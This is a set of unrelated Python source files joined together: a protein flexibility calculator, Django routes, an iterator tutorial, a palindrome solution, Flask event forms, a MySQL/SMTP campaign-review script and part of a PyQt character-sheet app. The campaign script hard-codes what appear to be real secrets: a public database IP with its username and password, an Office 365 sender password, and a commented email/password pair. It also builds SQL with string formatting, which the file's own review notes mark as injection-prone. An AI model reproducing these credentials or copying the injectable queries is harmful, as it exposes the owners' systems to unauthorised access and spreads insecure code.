        self.AAFlex = np.asarray( list( "ARNDCQEGHILKMFPSTWYV" ) );
        # Flexibility scales for residues with 1, 0 and 2 rigid neighbours.
        self.Flx1R = np.array( [ 0,0.946,1.028,1.006,1.089,0.878,1.028,1.036,1.042,0.952,0.892,0.961,1.082,0.862,0.912,1.085,1.048,1.051,0.917,0.93,0.927 ] );
        self.Flx0R = np.array( [ 0,1.041,1.038,1.117,1.033,0.96,1.165,1.094,1.142,0.982,1.002,0.967,1.093,0.947,0.93,1.055,1.169,1.073,0.925,0.961,0.982 ] );
        self.Flx2R = np.array( [ 0,0.892,0.901,0.93,0.932,0.925,0.885,0.933,0.923,0.894,0.872,0.921,1.057,0.804,0.914,0.932,0.923,0.934,0.803,0.837,0.913 ] );

    def calculate( self ):
        """Fill self.KD and self.Flx from the two stored sequences.

        Assumes both sequences have the same length -- TODO confirm; `other`
        is indexed with positions derived from len(ori).
        """
        ori = self.ori
        other = self.other
        LQ = len( ori )
        Rig = 0
        Dif = 0
        if LQ > 0 :
            # Per-position flexibility profiles for query (FlQ) and subject (FlS).
            FlQ = np.zeros( LQ + 1 )
            FlS = np.zeros( LQ + 1 )
            # Terminal positions: choose the flexibility table by whether the
            # adjacent residue is rigid.
            # NOTE(review): len() of the tuple returned by np.where is always 1,
            # so these four conditions are always true and the else branches
            # never run -- the test probably intended len(np.where(...)[0]).
            if len( np.where(self.Rigid == ori[0]) ) > 0 :
                AAFlexLoc = np.where(self.AAFlex == ori[1])[0]
                FlQ[0] = self.Flx1R[AAFlexLoc]
            else :
                AAFlexLoc = np.where(self.AAFlex == ori[1])[0]
                FlQ[0] = self.Flx0R[AAFlexLoc]
            if len( np.where(self.Rigid == other[0]) ) > 0 :
                AAFlexLoc = np.where(self.AAFlex == other[1])[0]
                FlS[0] = self.Flx1R[AAFlexLoc]
            else :
                AAFlexLoc = np.where(self.AAFlex == other[1])[0]
                FlS[0] = self.Flx0R[AAFlexLoc]
            if len( np.where(self.Rigid == ori[ LQ - 2 ]) ) > 0 :
                AAFlexLoc = np.where(self.AAFlex == ori[ LQ - 1 ])[0]
                FlQ[ LQ - 1 ] = self.Flx1R[AAFlexLoc]
            else :
                AAFlexLoc = np.where(self.AAFlex == ori[ LQ - 1 ])[0]
                FlQ[ LQ - 1 ] = self.Flx0R[AAFlexLoc]
            if len( np.where(self.Rigid == other[ LQ - 2 ]) ) > 0 :
                AAFlexLoc = np.where(self.AAFlex == other[ LQ - 1 ])[0]
                FlS[ LQ - 1 ] = self.Flx1R[AAFlexLoc]
            else :
                AAFlexLoc = np.where(self.AAFlex == other[ LQ - 1 ])[0]
                FlS[ LQ - 1 ] = self.Flx0R[AAFlexLoc]
            # Interior positions: count rigid neighbours at i and i+2, then
            # look up the flexibility of the residue in between (i+1).
            for i in range(1, LQ-2):
                if len( np.where(self.Rigid == ori[ i ])[0] ) > 0 :
                    Rig = 1
                else :
                    Rig = 0
                if len( np.where(self.Rigid == ori[ i+2 ])[0] ) > 0 :
                    Rig = Rig + 1;
                AAFlexLoc = np.where(self.AAFlex == ori[i+1])[0]
                # Truthiness of a size-1 index array: non-empty means "found".
                # NOTE(review): this raises for multi-element arrays and warns
                # on newer numpy for empty ones -- consider AAFlexLoc.size.
                if AAFlexLoc:
                    if Rig == 0:
                        FlQ[i] = self.Flx0R[AAFlexLoc]
                    if Rig == 1:
                        FlQ[i] = self.Flx1R[AAFlexLoc]
                    if Rig == 2:
                        FlQ[i] = self.Flx2R[AAFlexLoc]
                # Same computation for the subject sequence.
                if len( np.where(self.Rigid == other[ i ])[0] ) > 0 :
                    Rig = 1
                else :
                    Rig = 0
                if len( np.where(self.Rigid == other[ i+2 ])[0] ) > 0 :
                    Rig = Rig + 1;
                AAFlexLoc = np.where(self.AAFlex == other[i+1])[0]
                if AAFlexLoc:
                    if Rig == 0:
                        FlS[i] = self.Flx0R[AAFlexLoc]
                    if Rig == 1:
                        FlS[i] = self.Flx1R[AAFlexLoc]
                    if Rig == 2:
                        FlS[i] = self.Flx2R[AAFlexLoc]
                # Accumulate the squared hydropathy difference at position i+1.
                OriLoc = np.where(self.AAKD == ori[i+1])[0]
                OtherLoc = np.where(self.AAKD == other[i+1])[0]
                # NOTE(review): comparing index arrays with >= 0; empty arrays
                # make the `and` ambiguous on newer numpy -- confirm inputs.
                if OriLoc >= 0 and OtherLoc >= 0 :
                    Dif = Dif + pow(self.KDp[OriLoc]-self.KDp[OtherLoc], 2)
            self.KD = float( Dif / LQ )
            Dif = 0;
            # Smooth both flexibility profiles with a 7-position weighted
            # window and accumulate the squared profile differences.
            for i in range(3, LQ-3):
                Query = 0.25*FlQ[i-3]+0.5*FlQ[i-2]+0.75*FlQ[i-1]+FlQ[i]+0.25*FlQ[i+3]+0.5*FlQ[i+2]+0.75*FlQ[i+1]
                Subje = 0.25*FlS[i-3]+0.5*FlS[i-2]+0.75*FlS[i-1]+FlS[i]+0.25*FlS[i+3]+0.5*FlS[i+2]+0.75*FlS[i+1]
                Dif = Dif + pow((Query/4)-(Subje/4),2)
            self.Flx = Dif / LQ
# print( )
|
from django.conf.urls import url
from .models import *
from . import views
from .views import *
#app_name = lms
# URL routes for this app: the admin home page at the root, plus logout.
urlpatterns = [
    url(r'^$', views.adminhome, name= 'index'),
    url(r'^logout/$', views.logout_page, name = 'logout'),
]
|
import os

# BUG FIX: "cls" only exists on Windows; fall back to "clear" on POSIX shells.
os.system("cls" if os.name == "nt" else "clear")

# Python iterators: iter() returns an iterator, next() advances it one step.
mytuple = ("apple", "banana", "cherry", "orange", "mango", "carrot")
myit = iter(mytuple)
for _ in range(len(mytuple)):
    print(next(myit))
print()

# Strings are iterable too: step through "Benjamin" character by character.
mystr = "Benjamin"
myit = iter(mystr)
for _ in range(len(mystr)):
    print(next(myit))
print()

# Looping through an iterable directly with a for statement.
mytuple = ("apple", "banana", "cherry", "orange", "mango", "carrot")
for x in mytuple:
    print(x)
print()

mytuple1 = "carrot"
for x1 in mytuple1:
    print(x1)
print()
# Create an Iterator
class MyNumbers:
    """Unbounded iterator yielding 1, 2, 3, ... (never raises StopIteration)."""

    def __iter__(self):
        # Restart the counter each time iteration begins.
        self.a = 1
        return self

    def __next__(self):
        current = self.a
        self.a += 1
        return current
# Pull the first eight values (1 through 8) from the infinite iterator.
myclass = MyNumbers()
myiter = iter(myclass)
for _ in range(8):
    print(next(myiter))
print()
# StopIteration
# StopIteration
class MyNumbers:
    """Iterator yielding 1 through 20, then raising StopIteration."""

    def __iter__(self):
        self.a = 1
        return self

    def __next__(self):
        if self.a > 20:
            # Signal exhaustion so for-loops terminate cleanly.
            raise StopIteration
        current = self.a
        self.a += 1
        return current
# Drive the bounded iterator; the for-loop stops when StopIteration is raised.
myclass = MyNumbers()
myiter = iter(myclass)
for x in myiter:
    print(x)
|
def longestPalindrome(self, s):
    """
    :type s: str
    :rtype: str

    Return the longest palindromic substring of s. For each start index,
    slices are tested longest-first; the outer loop stops early once no
    remaining suffix can beat the current best.
    """
    # Trivial cases: empty string, or a single repeated character.
    if not s or len(set(s)) == 1:
        return s
    if len(s) == 2:
        # Two distinct characters: either one is a valid one-char answer.
        return s if s[0] == s[1] else s[1]
    best = s[0]
    for start in range(len(s)):
        # Remaining suffix cannot be longer than the current best: stop.
        if len(best) >= len(s) - start:
            break
        for stop in range(len(s), start, -1):
            candidate = s[start:stop]
            if candidate == candidate[::-1] and len(candidate) > len(best):
                best = candidate
    return best
# -*- coding: utf-8 -*-
from flask_wtf import FlaskForm
from wtforms import (
HiddenField, SubmitField, BooleanField,
StringField, PasswordField, SelectField,
TextAreaField, RadioField, IntegerField,
SelectMultipleField
)
from wtforms.fields import (
DateField, TimeField, DecimalField,
URLField, EmailField,
)
from wtforms.validators import DataRequired, length
from dribdat.user.models import User, Project, Event, Role, Resource
from ..user.validators import (
UniqueValidator, event_date_check, event_time_check
)
from ..user import projectProgressList, resourceTypeList
from os import environ
from datetime import time, datetime
def get_time_note():
    """Construct a time zone message."""
    now_local = datetime.now().astimezone()
    note = "The current server time is %s." % now_local.strftime('%H:%M%z')
    # Append the configured zone name when the TIME_ZONE env var is set.
    tz = environ.get('TIME_ZONE', None)
    if tz is None:
        return note
    return "%s Time zone: %s" % (note, tz)
class UserForm(FlaskForm):
    """User editing form (admin side): credentials, display name and flags."""

    next = HiddenField()
    id = HiddenField('id')
    # Username must be unique across User rows.
    username = StringField(
        u'Username',
        [length(max=80), UniqueValidator(User, 'username'), DataRequired()])
    email = EmailField(u'E-mail address', [length(max=80), DataRequired()])
    fullname = StringField(u'Display name (optional)', [length(max=200)])
    # Presumably left blank to keep the current password -- verify in the view.
    password = PasswordField(u'New password (optional)', [length(max=128)])
    is_admin = BooleanField(u"Administrator", default=False)
    active = BooleanField(u"Active", default=True)
    submit = SubmitField(u'Save')
class UserProfileForm(FlaskForm):
    """User profile editing form."""

    next = HiddenField()
    id = HiddenField('id')
    # Role choices are presumably populated by the view before rendering -- confirm.
    roles = SelectMultipleField(u'Roles', coerce=int)
    webpage_url = URLField(u'Online profile', [length(max=128)])
    my_story = TextAreaField(u'My story')
    my_goals = TextAreaField(u'My goals')
    submit = SubmitField(u'Save')
class EventForm(FlaskForm):
    """Event editing form.

    BUG FIX: `starts_date` and `ends_date` previously used
    `default=datetime.now()`, which is evaluated once at import time, so every
    new form defaulted to the date the server process started. WTForms accepts
    a callable for `default`, so `datetime.now` is now evaluated each time a
    form is instantiated.
    """

    next = HiddenField()
    id = HiddenField('id')
    name = StringField(
        u'Title',
        [length(max=80), UniqueValidator(Event, 'name'), DataRequired()])
    is_current = BooleanField(
        u'Featured', default=False,
        description=u'📣 Pin this event to the homepage.')
    is_hidden = BooleanField(
        u'Hidden', default=False,
        description=u'🚧 This event is not shown on the homepage.')
    lock_editing = BooleanField(
        u'Freeze projects', default=False,
        description=u'🔒 Prevent users editing any projects.')
    lock_starting = BooleanField(
        u'Lock projects', default=False,
        description=u'🔒 Block starting new projects here.')
    lock_resources = BooleanField(
        u'Resource area', default=False,
        description=u'💡 Used as toolbox, ignoring start and finish.')
    lock_templates = BooleanField(
        u'Templates', default=False,
        description=u'💡 Contains templates, which can be used for new projects.')
    starts_date = DateField(
        u'Starting date', [event_date_check], default=datetime.now)
    # NOTE(review): description=get_time_note() is still evaluated at import
    # time, so the displayed server time is from process start -- confirm intent.
    starts_time = TimeField(
        u'Starting time',
        [event_time_check], default=time(9, 0, 0),
        description=get_time_note())
    ends_date = DateField(u'Finish date', default=datetime.now)
    ends_time = TimeField(u'Finish time', default=time(16, 0, 0))
    summary = StringField(
        u'Summary',
        [length(max=140)],
        description=u'A short tagline of the event, in max 140 characters')
    hostname = StringField(
        u'Hosted by',
        [length(max=80)],
        description=u'Organization responsible for the event')
    location = StringField(
        u'Located at',
        [length(max=255)],
        description=u'The event locale or virtual space')
    location_lat = DecimalField(
        u'Latitude', places=5, default=0,
        description=u'The geo-coordinates (WGS84) of your event')
    location_lon = DecimalField(
        u'Longitude', places=5, default=0,
        description=u'Tip: use map.geo.admin.ch or gps-coordinates.org')
    hashtags = StringField(
        u'Hashtags',
        [length(max=255)],
        description=u'Social media hashtags for this event')
    description = TextAreaField(
        u'Description',
        description=u'Markdown and HTML supported')
    logo_url = URLField(
        u'Host logo link',
        [length(max=255)],
        description=u'Image hosted on a hotlinkable website - '
        + 'such as imgbox.com (max 688x130)')
    gallery_url = URLField(
        u'Gallery links',
        [length(max=2048)],
        description=u'Larger background image (max 1920x1080)')
    webpage_url = URLField(
        u'Home page link',
        [length(max=255)],
        description=u'Link to register or get more info about the event')
    community_url = URLField(
        u'Community link',
        [length(max=255)],
        description=u'To find others on a community forum or social media')
    certificate_path = URLField(
        u'Certificate link',
        [length(max=1024)],
        description='Include {username}, {email} or {sso} identifier '
        + 'to generate links to your participant certificate')
    instruction = TextAreaField(
        u'Instructions',
        description=u'Shown to registered participants only - '
        + 'Markdown and HTML supported')
    boilerplate = TextAreaField(
        u'Quickstart guide',
        description=u'Shown when starting a new project: Markdown and HTML supported')
    community_embed = TextAreaField(
        u'Code of conduct and community links',
        description=u'Bottom of event and project page: Markdown, HTML and '
        + 'embedded scripts are supported')
    custom_css = TextAreaField(
        u'Custom stylesheet (CSS)',
        description=u'For external CSS: @import url(https://...);')
    submit = SubmitField(u'Save')
class ProjectForm(FlaskForm):
    """Project editing form."""

    next = HiddenField()
    id = HiddenField('id')
    user_name = StringField(u'Started by')
    event_id = SelectField(u'Event', coerce=int)
    category_id = SelectField(u'Category', coerce=int)
    progress = SelectField(u'Progress', coerce=int,
                           choices=projectProgressList())
    # Project titles must be unique.
    name = StringField(
        u'Title',
        [length(max=80), UniqueValidator(Project, 'name'), DataRequired()])
    summary = StringField(u'Short summary', [length(max=140)])
    longtext = TextAreaField(u'Description')
    autotext_url = URLField(
        u'Readme',
        [length(max=2048)],
        description="Location from which to Sync content")
    autotext = TextAreaField(u'Readme content')
    webpage_url = URLField(u'Presentation or demo link', [length(max=2048)])
    is_webembed = BooleanField(u'Embed contents of demo link', default=False)
    hashtag = StringField(
        u'Hashtags',
        [length(max=255)],
        description="Team channel or social media hashtag")
    contact_url = URLField(u'Contact link', [length(max=2048)])
    source_url = URLField(u'Source link', [length(max=2048)])
    download_url = URLField(u'Download link', [length(max=2048)])
    image_url = URLField(u'Image link', [length(max=255)])
    logo_color = StringField(u'Custom color')
    logo_icon = StringField(
        u'Custom icon',
        [length(max=20)],
        description='https://fontawesome.com/v4/cheatsheet')
    submit = SubmitField(u'Save')
class CategoryForm(FlaskForm):
    """Category editing form."""

    next = HiddenField()
    name = StringField(u'Name', [length(max=80), DataRequired()])
    description = TextAreaField(u'Description',
                                description=u'Markdown and HTML supported')
    logo_color = StringField(u'Custom color')
    logo_icon = StringField(u'Custom icon', [length(max=20)],
                            description=u'fontawesome.com/v4/cheatsheet')
    event_id = SelectField(u'Specific to an event, or global if blank',
                           coerce=int)
    submit = SubmitField(u'Save')
class RoleForm(FlaskForm):
    """Role (user profile) editing form."""

    next = HiddenField()
    id = HiddenField('id')
    # Role names must be unique.
    name = StringField(
        u'Name',
        [length(max=80), UniqueValidator(Role, 'name'), DataRequired()])
    submit = SubmitField(u'Save')
class ResourceForm(FlaskForm):
    """Resource form (NOT USED)."""

    next = HiddenField()
    id = HiddenField('id')
    name = StringField(
        u'Name',
        [length(max=80), UniqueValidator(Resource, 'name'), DataRequired()])
    project_id = IntegerField(u'Project id')
    type_id = RadioField(u'Type', coerce=int, choices=resourceTypeList())
    source_url = URLField(
        u'Link',
        [length(max=2048)], description=u'URL to get more information')
    content = TextAreaField(
        u'Comment',
        description=u'Describe this resource in more detail')
    progress_tip = SelectField(
        u'Recommended at',
        coerce=int,
        choices=projectProgressList(True, True),
        description=u'Progress level at which to suggest this to teams')
    is_visible = BooleanField(u'Approved and visible to participants')
    submit = SubmitField(u'Save')
|
import smtplib
import ssl
from string import Template
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import json
import requests
import sys
import re
import mysql.connector as mysql
from datetime import datetime, timedelta
import numpy as mp
# uomg@omg.com.gt OMG2018u
# Module-level shared MySQL connection, set by openConnection().
conn = None


def openConnection():
    """Open the global MySQL connection; exit the process on failure.

    NOTE(review): credentials are hard-coded here (and in send()); they should
    be moved to environment variables or a configuration file.
    """
    global conn
    try:
        conn = mysql.connect(host='3.95.117.169', database='MediaPlatforms',
                             user='omgdev', password='Sdev@2002!', autocommit=True)
    except mysql.Error as err:
        # BUG FIX: narrowed from a bare except, and report the driver error
        # instead of silently discarding it.
        print("ERROR: NO SE PUEDO ESTABLECER CONEXION MYSQL.")
        print(err)
        sys.exit()
def send(campanas, names):
    """Email each responsible user an HTML table of their flagged campaigns.

    campanas -- list of tuples per flagged campaign: (campaign id, account,
                brand, medium, name, budget status, KPI status, budget %,
                KPI %, budget, KPI) -- presumably; built in CampaingsReview.
    names    -- comma-prefixed string of campaign ids.
    """
    cur = conn.cursor(buffered=True)
    try:
        body = ''
        sender_email = "adops-noreply@omg.com.gt"  # Enter your address
        password = "OMGdev2019"
        # Strip the leading separator comma.
        # NOTE(review): [1:-1] also drops the LAST character of the final id;
        # [1:] may be what was intended -- confirm.
        names = names[1:-1]
        # NOTE(review): string-formatted SQL is vulnerable to injection;
        # prefer parameterized queries.
        sqlCamping = """
        select distinct username, c.CampaingID from omgguate.usuario u
        inner join SysAdOps.RolsUsers ru on ru.UserID = u.idusuario
        inner join SysAdOps.Rols r on r.RolID = ru.RolID
        inner join mfcgt.mfcasignacion asg on asg.idusuario = u.idusuario
        inner join accountxmarca am on am.marca = asg.idmarca
        inner join Accounts a on a.AccountsID = am.account
        inner join Campaings c on c.AccountsID = a.AccountsID
        where c.CampaingID in ({})
        order by username;
        """.format(names)
        cur.execute(sqlCamping,)
        resultscon = cur.fetchall()
        # Rows are ordered by username; track the current recipient and the
        # last username so the final batch gets flushed too.
        correo = resultscon[0][0]
        last = resultscon[len(resultscon)-1][0]
        for res in resultscon:
            # Recipient changed (or last user reached): flush the rows
            # accumulated so far as one email to the previous recipient.
            if res[0] != correo or res[0] == last:
                html = """\
                <html>
                <body>
                <p>Hola,<br>
                Listado de Camapañas<br>
                </p>
                <table style="width:100%; border-collapse: collapse;" >
                <tr>
                <th style="border:1px solid black;padding: 10px;" >Cuenta</th>
                <th style="border:1px solid black;padding: 10px;">Marca</th>
                <th style="border:1px solid black;padding: 10px;">Medio</th>
                <th style="border:1px solid black;padding: 10px;">Nombre Camapaña</th>
                <th style="border:1px solid black;padding: 10px;">Resultado Presupuesto</th>
                <th style="border:1px solid black;padding: 10px;">Resutlado KPI</th>
                <th style="border:1px solid black;padding: 10px;">Presupuseto%</th>
                <th style="border:1px solid black;padding: 10px;">KPI%</th>
                <th style="border:1px solid black;padding: 10px;">Presupuseto</th>
                <th style="border:1px solid black;padding: 10px;">KPI</th>
                </tr>
                {}
                </table>
                </body>
                </html>
                """.format(body)
                body = MIMEText(
                    html, 'html')  # convert the body to a MIME compatible string
                receiver_email = correo
                msg = MIMEMultipart()
                msg['From'] = 'adops-noreply@omg.com.gt'
                msg['To'] = correo
                msg['Subject'] = 'Listado de Campañas ' + str(datetime.now())
                msg.attach(body)
                # NOTE(review): one SMTP connection is opened per recipient and
                # never quit(); actual sending is commented out below, so
                # receiver_email is currently unused -- confirm intent.
                server = smtplib.SMTP('smtp.office365.com', 587)
                server.ehlo()
                server.starttls()
                server.login(sender_email, password)
                #server.sendmail(sender_email, receiver_email, msg.as_string())
                body = ''
                correo = res[0]
            # Append this row's campaign data (matched by campaign id) to the
            # HTML body being accumulated for the current recipient.
            for cam in campanas:
                if cam[0] == res[1]:
                    body = body + '<tr style="border:1px solid black;padding: 10px;"> '
                    body = body + '<td>{}</td>'.format(cam[1])
                    body = body + '<td>{}</td>'.format(cam[2])
                    body = body + '<td>{}</td>'.format(cam[3])
                    body = body + '<td>{}</td>'.format(cam[4])
                    body = body + '<td>{}</td>'.format(cam[5])
                    body = body + '<td>{}</td>'.format(cam[6])
                    body = body + '<td>{}</td>'.format(cam[7])
                    body = body + '<td>{}</td>'.format(cam[8])
                    body = body + '<td>{}</td>'.format(cam[9])
                    body = body + '<td>{}</td>'.format(cam[10])
                    body = body + '</tr>'
                    break
    except Exception as e:
        print(e)
    else:
        print(datetime.now())
def CampaingsReview(conn):
    """Review active campaigns: compare spend/KPI pacing against plan and
    email the flagged ones via send().

    Budget/KPI tolerances tighten as the campaign progresses (15% early,
    down to 1% near the end).
    """
    cur = conn.cursor(buffered=True)
    # NOTE(review): this SQL contains {} placeholders (idusuario, EndDate) but
    # is executed below WITHOUT .format() or bound parameters -- it likely
    # fails as written; confirm the intended arguments.
    sqlCamping = """
    select dc.nombre as Account, dc.id idcliente,m.id idmarca ,c.CampaingID CampaingID, a.Media Media, c.Campaingname Campaingname, round(sum(distinct d.Cost),2) as 'InversionConsumida', date_format(c.StartDate, '%d/%m/%Y') StartDate , m.nombre as Marca,
    date_format(c.EndDate,'%d/%m/%Y') EndDate , SUBSTRING_INDEX(SUBSTRING_INDEX(c.Campaingname, '_', 11),'_',-1) as 'PresupuestoPlan',SUBSTRING_INDEX (SUBSTRING_INDEX(c.Campaingname, '_', 13),'_',-1) KPIPlanificado,
    md.Nombre KPI,ifnull(sum(distinct d.result),0) 'KPIConsumido',c.Campaignstatus State,m.nombre Marca ,dc.nombre Cliente,date_format(now(),'%M') mes,
    '0' as 'TotalDias','0' as 'DiasEjecutados','0' as 'DiasPorservir', "0" as 'PresupuestoEsperado',"0" as 'PorcentajePresupuesto',
    "0" as 'PorcentajeEsperadoV',"0" as 'PorcentajeRealV',"0" as 'KPIEsperado',"0" as 'PorcentajeKPI', "0" as 'PorcentajeEsperadoK',"0" as 'PorcentajeRealK', "0" as 'EstadoKPI', "0" as 'EstadoPresupuesto'
    from dailycampaing d
    inner join Campaings c on c.CampaingID = d.CampaingID
    inner join Accounts a on c.AccountsID = a.AccountsID
    inner join accountxmarca am on am.account = a.AccountsID
    inner join mfcgt.mfcasignacion asg on asg.idmarca = am.marca
    inner join mfcgt.dmarca m on am.marca = m.id
    inner join mfcgt.dcliente dc on dc.id = m.idcliente
    inner join modelocompra md on md.abr = SUBSTRING_INDEX (SUBSTRING_INDEX(c.Campaingname, '_', 14),'_',-1)
    where c.Campaignstatus in ('ACTIVE','enabled') and asg.idusuario = {} and c.EndDate > '{}'
    group by d.CampaingID;
    """
    try:
        campanas = []       # flagged campaign tuples handed to send()
        campananames = ''   # comma-prefixed id list handed to send()
        print(datetime.now())
        cur.execute(sqlCamping,)
        resultscon = cur.fetchall()
        for row in resultscon:
            # Campaign names encode plan data (budget, KPI, dates) in a
            # fixed underscore-separated nomenclature; validate it first.
            Nomenclatura = row[3]
            searchObj = re.search(r'([0-9,.]+)_(GT|CAM|RD|US|SV|HN|NI|CR|PA|RD|PN|CHI|HUE|PR)_([a-zA-ZáéíóúÁÉÍÓÚÑñ\s0-9-/.+&]+)_([a-zA-Z0-9-/.+&]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ0-9-/.+&0-9]+)_([a-zA-Z-/.+]+)_([a-zA-ZáéíóúÁÉÍÓÚÑñ.+0-9]+)_(ENE|FEB|MAR|ABR|MAY|JUN|JUL|AGO|SEP|OCT|NOV|DIC)_(2019|19|20|2020)_([0-9,.]+)_(BA|AL|TR|TRRS|TRRRSS|IN|DES|RV|CO|MESAD|LE)_([0-9,.]+)_(CPM|CPMA|CPVI|CPC|CPI|CPD|CPV|CPCo|CPME|CPE|PF|RF|MC|CPCO|CPCO)_([0-9.,]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([a-zA-Z-/áéíóúÁÉÍÓÚÑñ+&0-9]+)_([0-9,.-]+)?(_B-)?(_)?([0-9.,]+)?(_S-)?(_)?([0-9.,]+)?(\(([0-9.)])\))?(/[0-9].+)?', Nomenclatura, re.M | re.I)
            if searchObj:
                # Skip rows with unset MySQL zero-dates.
                if row[5] != '0000-00-00' and row[6] != '0000-00-00':
                    Start = datetime.strptime(row[5], "%d/%m/%Y")
                    End = datetime.strptime(row[6], "%d/%m/%Y")
                    TotalDias = End - Start
                    DiasEjectuados = datetime.now() - Start
                    DiasPorservir = End - datetime.now()
                    if TotalDias.days > 0:
                        # Fraction of the flight elapsed so far.
                        porcentDay = DiasEjectuados.days / \
                            ((TotalDias.days) + 1)
                        PresupuestoEsperado = round(float(row[7]) * porcentDay, 2)
                        if float(row[7]) > 0:
                            PorcentajeEsperadoV = round(
                                float(PresupuestoEsperado) / float(row[7]), 2)
                            PorcentajeRealV = round(
                                float(row[4]) / float(row[7]), 2)
                            # Deviation from 100% of planned budget pace.
                            PorcentajePresupuesto = PorcentajeRealV - 1
                            KPIEsperado = round(float(row[8]) * porcentDay, 2)
                            if float(row[8]) > 0:
                                PorcentajeEsperadoK = round(
                                    float(KPIEsperado) / float(row[8]), 2)
                                PorcentajeRealK = round(
                                    float(row[10]) / float(row[8]), 2)
                                PorcentajeKPI = PorcentajeRealK - 1
                                TotalDias = TotalDias.days
                                DiasEjectuados = DiasEjectuados.days
                                DiasPorservir = DiasPorservir.days + 1
                                EstadoPresupuesto = 0
                                EstadoKPI = 0
                                # Tolerance bands shrink as the flight advances.
                                # NOTE(review): abs(int(...)) truncates toward
                                # zero before comparing with fractional
                                # thresholds -- abs(...) alone was likely meant.
                                if porcentDay <= 0.25:
                                    if abs(int(PorcentajePresupuesto)) <= 0.15:
                                        EstadoPresupuesto = 1
                                    if abs(int(PorcentajeKPI)) <= 0.15:
                                        EstadoKPI = 1
                                elif porcentDay > 0.25 and porcentDay <= 0.50:
                                    if abs(int(PorcentajePresupuesto)) <= 0.10:
                                        EstadoPresupuesto = 1
                                    if abs(int(PorcentajeKPI)) <= 0.10:
                                        EstadoKPI = 1
                                elif porcentDay > 0.50 and porcentDay <= 0.85:
                                    if abs(int(PorcentajePresupuesto)) <= 0.05:
                                        EstadoPresupuesto = 1
                                    if abs(int(PorcentajeKPI)) <= 0.05:
                                        EstadoKPI = 1
                                elif porcentDay > 0.85:
                                    if abs(int(PorcentajePresupuesto)) <= 0.01:
                                        EstadoPresupuesto = 1
                                    if abs(int(PorcentajeKPI)) <= 0.01:
                                        EstadoKPI = 1
                                # Flag any campaign whose budget or KPI pace is bad.
                                if EstadoPresupuesto == 0 and EstadoKPI == 1:
                                    campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Malo', 'Estado KPI Bueno', str(round(float(
                                        PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
                                    campananames = campananames + ',' + row[1]
                                elif EstadoPresupuesto == 1 and EstadoKPI == 0:
                                    campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Bueno', 'Estado KPI Malo', str(round(float(
                                        PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
                                    campananames = campananames + ',' + row[1]
                                elif EstadoPresupuesto == 0 and EstadoKPI == 0:
                                    campana = (row[1], row[0], row[12], row[2], row[3], 'Estado Presupuesto Malo', 'Estado KPI Malo', str(round(float(
                                        PorcentajePresupuesto))), str(round(float(PorcentajeKPI), 2)), str(round(float(row[4]), 2)), str(round(float(row[8]), 2)))
                                    campananames = campananames + ',' + row[1]
                                # NOTE(review): when both states are good,
                                # `campana` keeps its previous value (or is
                                # unbound on the first row) and a stale/missing
                                # tuple is appended -- confirm intended guard.
                                campanas.append(campana)
        if campanas:
            send(campanas, campananames)
    except Exception as e:
        print(e)
    finally:
        print(datetime.now())
if __name__ == '__main__':
    # Open the shared connection, run one review pass, then clean up.
    openConnection()
    CampaingsReview(conn)
    conn.close()
|
from Character import *
from Creator import *
from page1 import *
from page2 import *
from page3 import *
from WeaponWidget import *
#from LevelUp import *
from random import *
from Races import *
from Classes import *
from Backgrounds import *
from Feats import *
from Features import *
from Armor import *
from Weapons import *
from Items import *
import images
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import sys
import os
import ctypes
# Win32 file attribute flag used to hide the save folder on Windows.
FILE_ATTRIBUTE_HIDDEN = 0x02

# Save-file directory: dot-prefixed (conventionally hidden) on POSIX,
# attribute-hidden via the Win32 API on Windows.
if os.name != 'nt':
    path = r'.Characters'
else:
    path = r'Characters'
if not os.path.exists(path):
    os.makedirs(path)
if os.name == 'nt':
    # Hide the folder; SetFileAttributesW returns 0 on failure.
    ret = ctypes.windll.kernel32.SetFileAttributesW(path, FILE_ATTRIBUTE_HIDDEN)
    if not ret:
        raise ctypes.WinError()
class characterSelect(QWidget):
    """Startup dialog that asks for the character's name.

    The chosen name is read from self.name after the dialog closes.
    """

    def __init__(self):
        super().__init__()
        f = QFont()
        f.setFamily('URW Chancery L')
        f.setPointSize(16)
        self.icon = QIcon(':/icon.png')
        self.name = ''  # filled in by setName() when the user clicks Done
        self.le = QLineEdit()
        self.le.setPlaceholderText('Character Name')
        self.le.setAlignment(Qt.AlignCenter)
        self.le.setFont(f)
        self.btn = QPushButton('Done')
        self.btn.setFont(f)
        self.layout = QVBoxLayout(self)
        self.initUI()

    def initUI(self):
        """Assemble the layout, wire the button, then show and center the window."""
        self.setWindowTitle('Character Select')
        self.setWindowIcon(self.icon)
        self.layout.addWidget(self.le)
        self.layout.addWidget(self.btn)
        self.btn.clicked.connect(self.setName)
        self.show()
        self.center()

    def center(self):
        """Move the window to the center of the available screen area."""
        qr = self.frameGeometry()
        cp = QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())

    def setName(self):
        """Store the entered name and close the dialog."""
        self.name = self.le.text()
        self.close()
class CharacterSheet(QMainWindow):
    """Main window: three tabbed pages (character, spellcasting, notes)."""

    def __init__(self, char):
        super().__init__()
        self.char = char
        self.title = 'Character Sheet'
        self.window = QTabWidget()
        self.setCentralWidget(self.window)
        # Page widgets are presumably defined in page1/page2/page3 modules.
        self.page1 = CharacterPage(char)
        self.page2 = SpellsPage(char)
        self.page3 = NotesPage(char)
        self.icon = QIcon(':/icon.png')
        self.initUI()

    def initUI(self):
        """Add the three tabs, set fonts, then show and center the window."""
        self.setWindowTitle(self.title)
        self.setWindowIcon(self.icon)
        self.window.addTab(self.page1, 'Character')
        self.window.addTab(self.page2, 'Spellcasting')
        self.window.addTab(self.page3, 'Notes & Misc')
        clf = QFont()
        clf.setFamily('URW Chancery L')
